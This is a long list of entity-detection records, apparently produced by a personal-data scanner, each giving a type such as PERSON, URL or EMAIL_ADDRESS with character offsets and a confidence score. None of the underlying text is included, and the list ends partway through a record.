type: URL, start: 20501, end: 20507, score: 0.5, type: URL, start: 20528, end: 20535, score: 0.5, type: URL, start: 20558, end: 20567, score: 0.5, type: URL, start: 20603, end: 20610, score: 0.5, type: URL, start: 20633, end: 20650, score: 0.5, type: URL, start: 20680, end: 20694, score: 0.5, type: URL, start: 21582, end: 21589, score: 0.5, type: URL, start: 21632, end: 21646, score: 0.5, type: PERSON, start: 97, end: 105, score: 0.85, type: PERSON, start: 263, end: 278, score: 0.85, type: PERSON, start: 572, end: 580, score: 0.85, type: LOCATION, start: 773, end: 783, score: 0.85, type: PERSON, start: 1096, end: 1102, score: 0.85, type: PERSON, start: 1318, end: 1339, score: 0.85, type: PERSON, start: 1816, end: 1824, score: 0.85, type: PERSON, start: 1951, end: 1977, score: 0.85, type: LOCATION, start: 2090, end: 2096, score: 0.85, type: URL, start: 638, end: 644, score: 0.5, type: URL, start: 1022, end: 1026, score: 0.5, type: URL, start: 1510, end: 1514, score: 0.5, type: URL, start: 1572, end: 1583, score: 0.5, type: URL, start: 1827, end: 1839, score: 0.5, type: URL, start: 1917, end: 1924, score: 0.5, type: URL, start: 1951, end: 1958, score: 0.5, type: URL, start: 1999, end: 2011, score: 0.5, type: URL, start: 2063, end: 2070, score: 0.5, type: URL, start: 2221, end: 2234, score: 0.5, type: URL, start: 2243, end: 2251, score: 0.5, type: URL, start: 2264, end: 2270, score: 0.5, type: URL, start: 2338, end: 2343, score: 0.5, type: URL, start: 2372, end: 2377, score: 0.5, type: URL, start: 2505, end: 2510, score: 0.5, type: URL, start: 2985, end: 2990, score: 0.5, type: URL, start: 3020, end: 3025, score: 0.5, type: URL, start: 3097, end: 3101, score: 0.5, type: URL, start: 3491, end: 3500, score: 0.5, type: URL, start: 3600, end: 3606, score: 0.5, type: URL, start: 3623, end: 3628, score: 0.5, type: URL, start: 3735, end: 3740, score: 0.5, type: PERSON, start: 165, end: 176, score: 0.85, type: PERSON, start: 180, end: 185, score: 0.85, type: PERSON, start: 267, end: 272, score: 0.85, type: LOCATION, start: 732, end: 745, score: 0.85, type: PERSON, start: 1456, end: 1471, score: 0.85, type: PERSON, start: 1531, end: 1546, score: 0.85, type: PERSON, start: 1564, end: 1579, score: 0.85, type: PERSON, start: 1885, end: 1900, score: 0.85, type: PERSON, start: 1958, end: 1973, score: 0.85, type: PERSON, start: 1991, end: 2006, score: 0.85, type: PERSON, start: 3256, end: 3271, score: 0.85, type: LOCATION, start: 3440, end: 3455, score: 0.85, type: PERSON, start: 3467, end: 3482, score: 0.85, type: LOCATION, start: 3655, end: 3670, score: 0.85, type: LOCATION, start: 3682, end: 3697, score: 0.85, type: PERSON, start: 3699, end: 3714, score: 0.85, type: PERSON, start: 3882, end: 3897, score: 0.85, type: PERSON, start: 3973, end: 3988, score: 0.85, type: PERSON, start: 3990, end: 4005, score: 0.85, type: LOCATION, start: 4121, end: 4136, score: 0.85, type: LOCATION, start: 4148, end: 4163, score: 0.85, type: PERSON, start: 4165, end: 4180, score: 0.85, type: PERSON, start: 4446, end: 4461, score: 0.85, type: PERSON, start: 4537, end: 4552, score: 0.85, type: PERSON, start: 4554, end: 4569, score: 0.85, type: LOCATION, start: 4690, end: 4705, score: 0.85, type: LOCATION, start: 4717, end: 4732, score: 0.85, type: PERSON, start: 4734, end: 4749, score: 0.85, type: PERSON, start: 5577, end: 5592, score: 0.85, type: PERSON, start: 5636, end: 5651, score: 0.85, type: LOCATION, start: 5653, end: 5668, score: 0.85, type: IP_ADDRESS, start: 5737, end: 5746, score: 0.6, type: URL, start: 471, end: 478, score: 0.5, type: URL, start: 494, end: 501, score: 0.5, type: URL, start: 544, end: 551, score: 0.5, type: URL, start: 569, end: 576, score: 0.5, type: URL, start: 599, end: 606, score: 0.5, type: URL, start: 630, end: 637, score: 0.5, type: URL, start: 659, end: 666, score: 0.5, type: URL, start: 702, end: 709, score: 0.5, type: URL, start: 840, end: 847, score: 0.5, type: URL, start: 875, end: 882, score: 0.5, type: URL, start: 951, end: 958, score: 0.5, type: URL, start: 1077, end: 1084, score: 0.5, type: URL, start: 1155, end: 1162, score: 0.5, type: URL, start: 1237, end: 1244, score: 0.5, type: URL, start: 1345, end: 1352, score: 0.5, type: URL, start: 1490, end: 1498, score: 0.5, type: URL, start: 1597, end: 1605, score: 0.5, type: URL, start: 1769, end: 1776, score: 0.5, type: URL, start: 1919, end: 1925, score: 0.5, type: URL, start: 2024, end: 2030, score: 0.5, type: URL, start: 2147, end: 2154, score: 0.5, type: URL, start: 2225, end: 2232, score: 0.5, type: URL, start: 2265, end: 2272, score: 0.5, type: URL, start: 2346, end: 2353, score: 0.5, type: URL, start: 2375, end: 2380, score: 0.5, type: URL, start: 2397, end: 2409, score: 0.5, type: URL, start: 2446, end: 2453, score: 0.5, type: URL, start: 2541, end: 2546, score: 0.5, type: URL, start: 2562, end: 2574, score: 0.5, type: URL, start: 2618, end: 2625, score: 0.5, type: URL, start: 2821, end: 2828, score: 0.5, type: URL, start: 2856, end: 2864, score: 0.5, type: URL, start: 2909, end: 2917, score: 0.5, type: URL, start: 2947, end: 2959, score: 0.5, type: URL, start: 2973, end: 2985, score: 0.5, type: URL, start: 2989, end: 2999, score: 0.5, type: URL, start: 3005, end: 3015, score: 0.5, type: URL, start: 3199, end: 3206, score: 0.5, type: URL, start: 3287, end: 3299, score: 0.5, type: URL, start: 3386, end: 3398, score: 0.5, type: URL, start: 3498, end: 3510, score: 0.5, type: URL, start: 3597, end: 3609, score: 0.5, type: URL, start: 3821, end: 3828, score: 0.5, type: URL, start: 4024, end: 4031, score: 0.5, type: URL, start: 4051, end: 4058, score: 0.5, type: URL, start: 4386, end: 4393, score: 0.5, type: URL, start: 4588, end: 4595, score: 0.5, type: URL, start: 4615, end: 4622, score: 0.5, type: URL, start: 4906, end: 4913, score: 0.5, type: URL, start: 5026, end: 5033, score: 0.5, type: URL, start: 5040, end: 5047, score: 0.5, type: URL, start: 5126, end: 5146, score: 0.5, type: URL, start: 5194, end: 5200, score: 0.5, type: URL, start: 5207, end: 5217, score: 0.5, type: URL, start: 5299, end: 5306, score: 0.5, type: URL, start: 5423, end: 5430, score: 0.5, type: URL, start: 5484, end: 5502, score: 0.5, type: URL, start: 5614, end: 5621, score: 0.5, type: URL, start: 5670, end: 5677, score: 0.5, type: URL, start: 5697, end: 5707, score: 0.5, type: URL, start: 5710, end: 5720, score: 0.5, type: URL, start: 5762, end: 5766, score: 0.5, type: URL, start: 5773, end: 5780, score: 0.5, type: URL, start: 5895, end: 5902, score: 0.5, type: URL, start: 5936, end: 5951, score: 0.5, type: EMAIL_ADDRESS, start: 13, end: 28, score: 1.0, type: PERSON, start: 30, end: 47, score: 0.85, type: PERSON, start: 1652, end: 1664, score: 0.85, type: PERSON, start: 2626, end: 2636, score: 0.85, type: URL, start: 2715, end: 2723, score: 0.85, type: URL, start: 2767, end: 2774, score: 0.85, type: URL, start: 2869, end: 2877, score: 0.85, type: URL, start: 2908, end: 2916, score: 0.85, type: URL, start: 2939, end: 2944, score: 0.85, type: URL, start: 2957, end: 2966, score: 0.85, type: URL, start: 3701, end: 3709, score: 0.85, type: URL, start: 3715, end: 3722, score: 0.85, type: URL, start: 4600, end: 4608, score: 0.85, type: URL, start: 4614, end: 4622, score: 0.85, type: LOCATION, start: 5306, end: 5329, score: 0.85, type: NRP, start: 5494, end: 5503, score: 0.85, type: LOCATION, start: 6644, end: 6667, score: 0.85, type: LOCATION, start: 7709, end: 7732, score: 0.85, type: NRP, start: 7925, end: 7934, score: 0.85, type: PERSON, start: 9167, end: 9177, score: 0.85, type: URL, start: 9311, end: 9319, score: 0.85, type: URL, start: 9372, end: 9382, score: 0.85, type: URL, start: 9516, end: 9524, score: 0.85, type: URL, start: 9530, end: 9538, score: 0.85, type: PERSON, start: 9856, end: 9866, score: 0.85, type: URL, start: 9936, end: 9944, score: 0.85, type: URL, start: 9997, end: 10006, score: 0.85, type: URL, start: 10153, end: 10161, score: 0.85, type: URL, start: 10214, end: 10223, score: 0.85, type: URL, start: 10312, end: 10320, score: 0.85, type: URL, start: 10326, end: 10334, score: 0.85, type: PERSON, start: 10636, end: 10646, score: 0.85, type: URL, start: 10716, end: 10724, score: 0.85, type: URL, start: 10777, end: 10784, score: 0.85, type: URL, start: 10931, end: 10939, score: 0.85, type: URL, start: 10992, end: 10999, score: 0.85, type: URL, start: 11088, end: 11096, score: 0.85, type: URL, start: 11102, end: 11110, score: 0.85, type: PERSON, start: 11597, end: 11611, score: 0.85, type: PERSON, start: 11792, end: 11824, score: 0.85, type: PERSON, start: 12841, end: 12845, score: 0.85, type: PERSON, start: 12865, end: 12876, score: 0.85, type: DATE_TIME, start: 12920, end: 12925, score: 0.85, type: PERSON, start: 13164, end: 13178, score: 0.85, type: PERSON, start: 13359, end: 13391, score: 0.85, type: PERSON, start: 14408, end: 14412, score: 0.85, type: PERSON, start: 14432, end: 14443, score: 0.85, type: DATE_TIME, start: 14487, end: 14492, score: 0.85, type: PERSON, start: 14735, end: 14746, score: 0.85, type: URL, start: 1055, end: 1092, score: 0.6, type: URL, start: 1765, end: 1806, score: 0.6, type: URL, start: 1940, end: 1982, score: 0.6, type: IP_ADDRESS, start: 11815, end: 11824, score: 0.6, type: IP_ADDRESS, start: 13382, end: 13391, score: 0.6, type: URL, start: 19, end: 28, score: 0.5, type: URL, start: 211, end: 220, score: 0.5, type: URL, start: 656, end: 666, score: 0.5, type: URL, start: 669, end: 674, score: 0.5, type: URL, start: 1145, end: 1156, score: 0.5, type: URL, start: 1595, end: 1602, score: 0.5, type: URL, start: 2143, end: 2153, score: 0.5, type: URL, start: 2156, end: 2161, score: 0.5, type: URL, start: 2223, end: 2234, score: 0.5, type: URL, start: 2265, end: 2275, score: 0.5, type: URL, start: 2418, end: 2428, score: 0.5, type: URL, start: 2509, end: 2517, score: 0.5, type: URL, start: 2587, end: 2594, score: 0.5, type: URL, start: 3115, end: 3123, score: 0.5, type: URL, start: 3270, end: 3280, score: 0.5, type: URL, start: 3323, end: 3331, score: 0.5, type: URL, start: 3401, end: 3408, score: 0.5, type: URL, start: 3440, end: 3448, score: 0.5, type: URL, start: 3505, end: 3513, score: 0.5, type: URL, start: 3547, end: 3555, score: 0.5, type: URL, start: 3596, end: 3612, score: 0.5, type: URL, start: 3620, end: 3627, score: 0.5, type: URL, start: 3644, end: 3655, score: 0.5, type: URL, start: 3968, end: 3978, score: 0.5, type: URL, start: 4025, end: 4033, score: 0.5, type: URL, start: 4072, end: 4087, score: 0.5, type: URL, start: 4109, end: 4124, score: 0.5, type: URL, start: 4138, end: 4146, score: 0.5, type: URL, start: 4164, end: 4172, score: 0.5, type: URL, start: 4198, end: 4213, score: 0.5, type: URL, start: 4314, end: 4321, score: 0.5, type: URL, start: 4432, end: 4439, score: 0.5, type: URL, start: 4518, end: 4526, score: 0.5, type: URL, start: 4557, end: 4565, score: 0.5, type: URL, start: 4748, end: 4758, score: 0.5, type: URL, start: 4890, end: 4902, score: 0.5, type: URL, start: 4931, end: 4946, score: 0.5, type: URL, start: 5089, end: 5099, score: 0.5, type: URL, start: 5227, end: 5237, score: 0.5, type: URL, start: 5507, end: 5513, score: 0.5, type: URL, start: 5853, end: 5860, score: 0.5, type: URL, start: 5924, end: 5931, score: 0.5, type: URL, start: 5992, end: 5999, score: 0.5, type: URL, start: 6163, end: 6173, score: 0.5, type: URL, start: 6305, end: 6317, score: 0.5, type: URL, start: 6346, end: 6361, score: 0.5, type: URL, start: 6443, end: 6450, score: 0.5, type: URL, start: 6565, end: 6575, score: 0.5, type: URL, start: 6764, end: 6771, score: 0.5, type: URL, start: 6776, end: 6785, score: 0.5, type: URL, start: 6833, end: 6842, score: 0.5, type: URL, start: 6873, end: 6882, score: 0.5, type: URL, start: 6899, end: 6906, score: 0.5, type: URL, start: 6970, end: 6977, score: 0.5, type: URL, start: 7038, end: 7045, score: 0.5, type: URL, start: 7206, end: 7216, score: 0.5, type: URL, start: 7370, end: 7382, score: 0.5, type: URL, start: 7411, end: 7426, score: 0.5, type: URL, start: 7508, end: 7515, score: 0.5, type: URL, start: 7630, end: 7640, score: 0.5, type: URL, start: 7938, end: 7944, score: 0.5, type: URL, start: 8314, end: 8322, score: 0.5, type: URL, start: 8588, end: 8603, score: 0.5, type: URL, start: 8680, end: 8687, score: 0.5, type: URL, start: 8753, end: 8760, score: 0.5, type: URL, start: 8827, end: 8834, score: 0.5, type: URL, start: 8995, end: 9005, score: 0.5, type: URL, start: 9050, end: 9058, score: 0.5, type: URL, start: 9128, end: 9135, score: 0.5, type: URL, start: 9390, end: 9397, score: 0.5, type: URL, start: 9414, end: 9425, score: 0.5, type: URL, start: 9473, end: 9481, score: 0.5, type: URL, start: 9684, end: 9694, score: 0.5, type: URL, start: 9739, end: 9747, score: 0.5, type: URL, start: 9817, end: 9824, score: 0.5, type: URL, start: 10014, end: 10021, score: 0.5, type: URL, start: 10038, end: 10049, score: 0.5, type: URL, start: 10126, end: 10133, score: 0.5, type: URL, start: 10231, end: 10238, score: 0.5, type: URL, start: 10255, end: 10266, score: 0.5, type: URL, start: 10464, end: 10474, score: 0.5, type: URL, start: 10519, end: 10527, score: 0.5, type: URL, start: 10597, end: 10604, score: 0.5, type: URL, start: 10792, end: 10799, score: 0.5, type: URL, start: 10816, end: 10827, score: 0.5, type: URL, start: 10904, end: 10911, score: 0.5, type: URL, start: 11007, end: 11014, score: 0.5, type: URL, start: 11031, end: 11042, score: 0.5, type: URL, start: 11254, end: 11260, score: 0.5, type: URL, start: 11274, end: 11280, score: 0.5, type: URL, start: 11316, end: 11322, score: 0.5, type: URL, start: 11361, end: 11367, score: 0.5, type: URL, start: 11406, end: 11412, score: 0.5, type: URL, start: 11590, end: 11599, score: 0.5, type: URL, start: 11686, end: 11695, score: 0.5, type: URL, start: 11774, end: 11781, score: 0.5, type: URL, start: 11866, end: 11873, score: 0.5, type: URL, start: 11881, end: 11899, score: 0.5, type: URL, start: 11989, end: 12010, score: 0.5, type: URL, start: 12219, end: 12226, score: 0.5, type: URL, start: 12231, end: 12240, score: 0.5, type: URL, start: 12286, end: 12295, score: 0.5, type: URL, start: 12324, end: 12333, score: 0.5, type: URL, start: 12376, end: 12391, score: 0.5, type: URL, start: 12608, end: 12614, score: 0.5, type: URL, start: 12766, end: 12772, score: 0.5, type: URL, start: 12848, end: 12867, score: 0.5, type: URL, start: 12970, end: 12977, score: 0.5, type: URL, start: 12989, end: 13004, score: 0.5, type: URL, start: 13157, end: 13166, score: 0.5, type: URL, start: 13253, end: 13262, score: 0.5, type: URL, start: 13341, end: 13348, score: 0.5, type: URL, start: 13433, end: 13440, score: 0.5, type: URL, start: 13448, end: 13466, score: 0.5, type: URL, start: 13556, end: 13577, score: 0.5, type: URL, start: 13786, end: 13793, score: 0.5, type: URL, start: 13798, end: 13807, score: 0.5, type: URL, start: 13853, end: 13862, score: 0.5, type: URL, start: 13891, end: 13900, score: 0.5, type: URL, start: 13943, end: 13958, score: 0.5, type: URL, start: 14175, end: 14181, score: 0.5, type: URL, start: 14333, end: 14339, score: 0.5, type: URL, start: 14415, end: 14434, score: 0.5, type: URL, start: 14537, end: 14544, score: 0.5, type: URL, start: 14556, end: 14571, score: 0.5, type: URL, start: 14595, end: 14605, score: 0.5, type: URL, start: 14878, end: 14890, score: 0.5, type: URL, start: 14903, end: 14915, score: 0.5, type: URL, start: 14942, end: 14954, score: 0.5, type: URL, start: 14970, end: 14982, score: 0.5, type: EMAIL_ADDRESS, start: 62, end: 77, score: 1.0, type: DATE_TIME, start: 34, end: 43, score: 0.85, type: PERSON, start: 44, end: 61, score: 0.85, type: URL, start: 675, end: 703, score: 0.6, type: URL, start: 68, end: 77, score: 0.5, type: URL, start: 1865, end: 1872, score: 0.5, type: EMAIL_ADDRESS, start: 165, end: 180, score: 1.0, type: PERSON, start: 78, end: 88, score: 0.85, type: DATE_TIME, start: 121, end: 130, score: 0.85, type: PERSON, start: 233, end: 239, score: 0.85, type: URL, start: 975, end: 982, score: 0.85, type: URL, start: 1144, end: 1151, score: 0.85, type: URL, start: 1170, end: 1177, score: 0.85, type: URL, start: 1565, end: 1572, score: 0.85, type: URL, start: 1591, end: 1599, score: 0.85, type: PERSON, start: 1898, end: 1922, score: 0.85, type: URL, start: 171, end: 180, score: 0.5, type: URL, start: 311, end: 320, score: 0.5, type: URL, start: 455, end: 470, score: 0.5, type: URL, start: 1223, end: 1231, score: 0.5, type: URL, start: 1264, end: 1271, score: 0.5, type: URL, start: 1297, end: 1304, score: 0.5, type: URL, start: 1346, end: 1353, score: 0.5, type: URL, start: 1462, end: 1469, score: 0.5, type: URL, start: 1632, end: 1639, score: 0.5, type: URL, start: 1669, end: 1676, score: 0.5, type: URL, start: 2018, end: 2025, score: 0.5, type: URL, start: 2043, end: 2050, score: 0.5, type: URL, start: 2258, end: 2265, score: 0.5, type: URL, start: 2285, end: 2292, score: 0.5, type: URL, start: 2341, end: 2348, score: 0.5, type: URL, start: 2543, end: 2550, score: 0.5, type: URL, start: 2665, end: 2672, score: 0.5, type: URL, start: 2706, end: 2713, score: 0.5, type: URL, start: 2745, end: 2752, score: 0.5, type: URL, start: 2834, end: 2842, score: 0.5, type: URL, start: 2876, end: 2883, score: 0.5, type: URL, start: 2910, end: 2917, score: 0.5, type: EMAIL_ADDRESS, start: 2816, end: 2831, score: 1.0, type: EMAIL_ADDRESS, start: 3622, end: 3637, score: 1.0, type: PERSON, start: 623, end: 627, score: 0.85, type: LOCATION, start: 832, end: 846, score: 0.85, type: PERSON, start: 1478, end: 1486, score: 0.85, type: PERSON, start: 1713, end: 1753, score: 0.85, type: PERSON, start: 1763, end: 1767, score: 0.85, type: PERSON, start: 1828, end: 1841, score: 0.85, type: PERSON, start: 2090, end: 2104, score: 0.85, type: PERSON, start: 2590, end: 2604, score: 0.85, type: PERSON, start: 2706, end: 2719, score: 0.85, type: LOCATION, start: 2981, end: 2987, score: 0.85, type: PERSON, start: 3028, end: 3041, score: 0.85, type: NRP, start: 3778, end: 3784, score: 0.85, type: PERSON, start: 4017, end: 4031, score: 0.85, type: PERSON, start: 4117, end: 4130, score: 0.85, type: URL, start: 31, end: 37, score: 0.5, type: URL, start: 127, end: 134, score: 0.5, type: URL, start: 138, end: 143, score: 0.5, type: URL, start: 148, end: 159, score: 0.5, type: URL, start: 165, end: 172, score: 0.5, type: URL, start: 214, end: 221, score: 0.5, type: URL, start: 380, end: 387, score: 0.5, type: URL, start: 391, end: 396, score: 0.5, type: URL, start: 401, end: 412, score: 0.5, type: URL, start: 419, end: 426, score: 0.5, type: URL, start: 643, end: 650, score: 0.5, type: URL, start: 690, end: 697, score: 0.5, type: URL, start: 787, end: 794, score: 0.5, type: URL, start: 853, end: 860, score: 0.5, type: URL, start: 913, end: 920, score: 0.5, type: URL, start: 989, end: 996, score: 0.5, type: URL, start: 1060, end: 1067, score: 0.5, type: URL, start: 1127, end: 1134, score: 0.5, type: URL, start: 1154, end: 1161, score: 0.5, type: URL, start: 1236, end: 1243, score: 0.5, type: URL, start: 1413, end: 1420, score: 0.5, type: URL, start: 1541, end: 1548, score: 0.5, type: URL, start: 1725, end: 1736, score: 0.5, type: URL, start: 1793, end: 1798, score: 0.5, type: URL, start: 1828, end: 1833, score: 0.5, type: URL, start: 1986, end: 1991, score: 0.5, type: URL, start: 2033, end: 2038, score: 0.5, type: URL, start: 2076, end: 2083, score: 0.5, type: URL, start: 2090, end: 2095, score: 0.5, type: URL, start: 2134, end: 2141, score: 0.5, type: URL, start: 2148, end: 2153, score: 0.5, type: URL, start: 2207, end: 2214, score: 0.5, type: URL, start: 2221, end: 2226, score: 0.5, type: URL, start: 2280, end: 2287, score: 0.5, type: URL, start: 2340, end: 2351, score: 0.5, type: URL, start: 2387, end: 2392, score: 0.5, type: URL, start: 2425, end: 2434, score: 0.5, type: URL, start: 2590, end: 2599, score: 0.5, type: URL, start: 2634, end: 2641, score: 0.5, type: URL, start: 2648, end: 2657, score: 0.5, type: URL, start: 2692, end: 2699, score: 0.5, type: URL, start: 2706, end: 2715, score: 0.5, type: URL, start: 2746, end: 2753, score: 0.5, type: URL, start: 2802, end: 2813, score: 0.5, type: URL, start: 2822, end: 2831, score: 0.5, type: URL, start: 2997, end: 3002, score: 0.5, type: URL, start: 3028, end: 3033, score: 0.5, type: URL, start: 3364, end: 3371, score: 0.5, type: URL, start: 3376, end: 3383, score: 0.5, type: URL, start: 3497, end: 3504, score: 0.5, type: URL, start: 3509, end: 3516, score: 0.5, type: URL, start: 3523, end: 3528, score: 0.5, type: URL, start: 3608, end: 3619, score: 0.5, type: URL, start: 3628, end: 3637, score: 0.5, type: URL, start: 3798, end: 3803, score: 0.5, type: URL, start: 3831, end: 3840, score: 0.5, type: URL, start: 4017, end: 4026, score: 0.5, type: URL, start: 4053, end: 4060, score: 0.5, type: URL, start: 4067, end: 4076, score: 0.5, type: URL, start: 4103, end: 4110, score: 0.5, type: URL, start: 4117, end: 4126, score: 0.5, type: URL, start: 4156, end: 4163, score: 0.5, type: URL, start: 4239, end: 4246, score: 0.5, type: EMAIL_ADDRESS, start: 575, end: 590, score: 1.0, type: EMAIL_ADDRESS, start: 631, end: 646, score: 1.0, type: EMAIL_ADDRESS, start: 694, end: 709, score: 1.0, type: EMAIL_ADDRESS, start: 750, end: 765, score: 1.0, type: NRP, start: 267, end: 269, score: 0.85, type: LOCATION, start: 455, end: 462, score: 0.85, type: PERSON, start: 664, end: 716, score: 0.85, type: URL, start: 806, end: 813, score: 0.85, type: URL, start: 870, end: 877, score: 0.85, type: URL, start: 941, end: 948, score: 0.85, type: LOCATION, start: 2209, end: 2211, score: 0.85, type: LOCATION, start: 2413, end: 2417, score: 0.85, type: LOCATION, start: 3204, end: 3206, score: 0.85, type: URL, start: 4762, end: 4773, score: 0.85, type: URL, start: 4839, end: 4861, score: 0.85, type: LOCATION, start: 6366, end: 6368, score: 0.85, type: US_DRIVER_LICENSE, start: 4032, end: 4034, score: 0.6499999999999999, type: URL, start: 4483, end: 4558, score: 0.6, type: URL, start: 137, end: 146, score: 0.5, type: URL, start: 161, end: 170, score: 0.5, type: URL, start: 205, end: 224, score: 0.5, type: URL, start: 475, end: 494, score: 0.5, type: URL, start: 566, end: 572, score: 0.5, type: URL, start: 581, end: 590, score: 0.5, type: URL, start: 608, end: 615, score: 0.5, type: URL, start: 622, end: 628, score: 0.5, type: URL, start: 637, end: 646, score: 0.5, type: URL, start: 664, end: 671, score: 0.5, type: URL, start: 685, end: 691, score: 0.5, type: URL, start: 700, end: 709, score: 0.5, type: URL, start: 741, end: 747, score: 0.5, type: URL, start: 756, end: 765, score: 0.5, type: URL, start: 1041, end: 1048, score: 0.5, type: URL, start: 1058, end: 1065, score: 0.5, type: URL, start: 1093, end: 1112, score: 0.5, type: URL, start: 1172, end: 1186, score: 0.5, type: URL, start: 1207, end: 1226, score: 0.5, type: URL, start: 1270, end: 1284, score: 0.5, type: URL, start: 1340, end: 1354, score: 0.5, type: URL, start: 1367, end: 1373, score: 0.5, type: URL, start: 1404, end: 1418, score: 0.5, type: URL, start: 1431, end: 1437, score: 0.5, type: URL, start: 1569, end: 1588, score: 0.5, type: URL, start: 1746, end: 1753, score: 0.5, type: URL, start: 1785, end: 1792, score: 0.5, type: URL, start: 2065, end: 2074, score: 0.5, type: URL, start: 2103, end: 2110, score: 0.5, type: URL, start: 2144, end: 2160, score: 0.5, type: URL, start: 2178, end: 2185, score: 0.5, type: URL, start: 2193, end: 2200, score: 0.5, type: URL, start: 2466, end: 2473, score: 0.5, type: URL, start: 2487, end: 2494, score: 0.5, type: URL, start: 2509, end: 2518, score: 0.5, type: URL, start: 2520, end: 2528, score: 0.5, type: URL, start: 2561, end: 2568, score: 0.5, type: URL, start: 2829, end: 2836, score: 0.5, type: URL, start: 2869, end: 2876, score: 0.5, type: URL, start: 2907, end: 2914, score: 0.5, type: URL, start: 3162, end: 3169, score: 0.5, type: URL, start: 3229, end: 3240, score: 0.5, type: URL, start: 3375, end: 3386, score: 0.5, type: URL, start: 3692, end: 3714, score: 0.5, type: URL, start: 3749, end: 3753, score: 0.5, type: URL, start: 3831, end: 3838, score: 0.5, type: URL, start: 3862, end: 3869, score: 0.5, type: URL, start: 3951, end: 3958, score: 0.5, type: URL, start: 3965, end: 3972, score: 0.5, type: URL, start: 4202, end: 4216, score: 0.5, type: URL, start: 4270, end: 4281, score: 0.5, type: URL, start: 4346, end: 4368, score: 0.5, type: URL, start: 4578, end: 4582, score: 0.5, type: URL, start: 4896, end: 4900, score: 0.5, type: URL, start: 5350, end: 5357, score: 0.5, type: URL, start: 5385, end: 5392, score: 0.5, type: URL, start: 5531, end: 5538, score: 0.5, type: URL, start: 5617, end: 5626, score: 0.5, type: URL, start: 5656, end: 5678, score: 0.5, type: URL, start: 5717, end: 5721, score: 0.5, type: URL, start: 5799, end: 5818, score: 0.5, type: URL, start: 5936, end: 5953, score: 0.5, type: URL, start: 5986, end: 5995, score: 0.5, type: URL, start: 6021, end: 6043, score: 0.5, type: URL, start: 6078, end: 6082, score: 0.5, type: DATE_TIME, start: 20, end: 29, score: 0.85, type: PERSON, start: 90, end: 100, score: 0.85, type: PERSON, start: 105, end: 115, score: 0.85, type: PERSON, start: 129, end: 139, score: 0.85, type: PERSON, start: 141, end: 153, score: 0.85, type: PERSON, start: 155, end: 165, score: 0.85, type: PERSON, start: 205, end: 222, score: 0.85, type: PERSON, start: 224, end: 238, score: 0.85, type: LOCATION, start: 1004, end: 1031, score: 0.85, type: LOCATION, start: 1073, end: 1075, score: 0.85, type: PERSON, start: 1267, end: 1285, score: 0.85, type: PERSON, start: 1594, end: 1626, score: 0.85, type: LOCATION, start: 2227, end: 2230, score: 0.85, type: LOCATION, start: 2232, end: 2235, score: 0.85, type: LOCATION, start: 2237, end: 2240, score: 0.85, type: LOCATION, start: 3897, end: 3900, score: 0.85, type: LOCATION, start: 3902, end: 3905, score: 0.85, type: PERSON, start: 3975, end: 3990, score: 0.85, type: LOCATION, start: 4158, end: 4161, score: 0.85, type: LOCATION, start: 4163, end: 4166, score: 0.85, type: LOCATION, start: 4242, end: 4245, score: 0.85, type: LOCATION, start: 4247, end: 4250, score: 0.85, type: URL, start: 432, end: 474, score: 0.6, type: IP_ADDRESS, start: 1276, end: 1285, score: 0.6, type: URL, start: 892, end: 900, score: 0.5, type: URL, start: 904, end: 912, score: 0.5, type: URL, start: 926, end: 943, score: 0.5, type: URL, start: 965, end: 982, score: 0.5, type: URL, start: 1004, end: 1021, score: 0.5, type: URL, start: 1110, end: 1121, score: 0.5, type: URL, start: 1136, end: 1145, score: 0.5, type: URL, start: 1178, end: 1187, score: 0.5, type: URL, start: 1233, end: 1242, score: 0.5, type: URL, start: 1305, end: 1314, score: 0.5, type: URL, start: 1336, end: 1343, score: 0.5, type: URL, start: 1361, end: 1368, score: 0.5, type: URL, start: 1514, end: 1520, score: 0.5, type: URL, start: 1925, end: 1930, score: 0.5, type: URL, start: 2186, end: 2191, score: 0.5, type: URL, start: 2473, end: 2481, score: 0.5, type: URL, start: 2503, end: 2508, score: 0.5, type: URL, start: 2670, end: 2709, score: 0.5, type: URL, start: 3286, end: 3291, score: 0.5, type: URL, start: 3526, end: 3534, score: 0.5, type: URL, start: 3556, end: 3561, score: 0.5, type: URL, start: 3859, end: 3864, score: 0.5, type: URL, start: 3993, end: 4001, score: 0.5, type: URL, start: 4022, end: 4027, score: 0.5, type: URL, start: 4120, end: 4125, score: 0.5, type: URL, start: 4227, end: 4232, score: 0.5, type: EMAIL_ADDRESS, start: 138, end: 153, score: 1.0, type: PERSON, start: 124, end: 137, score: 0.85, type: PERSON, start: 669, end: 681, score: 0.85, type: PERSON, start: 890, end: 893, score: 0.85, type: PERSON, start: 935, end: 938, score: 0.85, type: PERSON, start: 7438, end: 7457, score: 0.85, type: IP_ADDRESS, start: 39, end: 40, score: 0.6, type: IP_ADDRESS, start: 121, end: 124, score: 0.6, type: URL, start: 144, end: 153, score: 0.5, type: URL, start: 2525, end: 2538, score: 0.5, type: URL, start: 3077, end: 3081, score: 0.5, type: URL, start: 3101, end: 3105, score: 0.5, type: URL, start: 3166, end: 3170, score: 0.5, type: URL, start: 5846, end: 5853, score: 0.5, type: URL, start: 6579, end: 6586, score: 0.5, type: URL, start: 7802, end: 7809, score: 0.5, type: URL, start: 8178, end: 8189, score: 0.5, type: URL, start: 8597, end: 8604, score: 0.5, type: URL, start: 9181, end: 9188, score: 0.5, type: URL, start: 9247, end: 9255, score: 0.5, type: URL, start: 9744, end: 9751, score: 0.5, type: URL, start: 9810, end: 9818, score: 0.5, type: URL, start: 11265, end: 11272, score: 0.5, type: URL, start: 11755, end: 11759, score: 0.5, type: URL, start: 11807, end: 11811, score: 0.5, type: URL, start: 12280, end: 12294, score: 0.5, type: URL, start: 12347, end: 12361, score: 0.5, type: URL, start: 12389, end: 12403, score: 0.5, type: URL, start: 12497, end: 12506, score: 0.5, type: URL, start: 13040, end: 13044, score: 0.5, type: URL, start: 13092, end: 13096, score: 0.5, type: URL, start: 13537, end: 13544, score: 0.5, type: URL, start: 13620, end: 13627, score: 0.5, type: URL, start: 13702, end: 13709, score: 0.5, type: UK_NHS, start: 3250, end: 3260, score: 1.0, type: PERSON, start: 124, end: 133, score: 0.85, type: PERSON, start: 367, end: 377, score: 0.85, type: PERSON, start: 1184, end: 1193, score: 0.85, type: LOCATION, start: 1195, end: 1198, score: 0.85, type: LOCATION, start: 1278, end: 1281, score: 0.85, type: PERSON, start: 1700, end: 1704, score: 0.85, type: PERSON, start: 2112, end: 2116, score: 0.85, type: LOCATION, start: 2560, end: 2580, score: 0.85, type: PERSON, start: 2696, end: 2717, score: 0.85, type: NRP, start: 2724, 